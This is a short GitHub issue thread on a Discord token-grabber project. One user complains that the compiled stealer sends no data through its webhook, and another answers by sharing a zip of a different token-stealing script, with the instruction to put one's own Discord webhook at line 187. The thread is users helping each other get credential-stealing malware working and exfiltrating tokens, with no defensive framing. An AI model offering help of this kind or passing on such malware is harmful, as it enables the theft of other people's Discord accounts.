### ISSUE TITLE
Doesn't work for me

### ISSUE THREAD

**Issue by NikitinGs** [wodxgod/Discord-Token-Grabber#30]
So, I think, I did everything ok, compiled it and etc (even version modifyed by Jansy-cc), but it just opens python window, closes it, and that's all; no messages was sent by webhook

**Comment by alext30Developer** [comment]
Same thing here. However, I know another script that does the same thing.

**Comment by NikitinGs** [comment]
> Same thing here. However, I know another script that does the same thing.

Oh, can you share it then, please?

**Comment by alext30Developer** [comment]
Sure, keep in mind that on line 187 you have to replace the text in the brackets with your own Discord webhook.

[token_grabber.zip](https://github.com/wodxgod/Discord-Token-Grabber/files/6136615/token_grabber.zip)

I hope this helped.
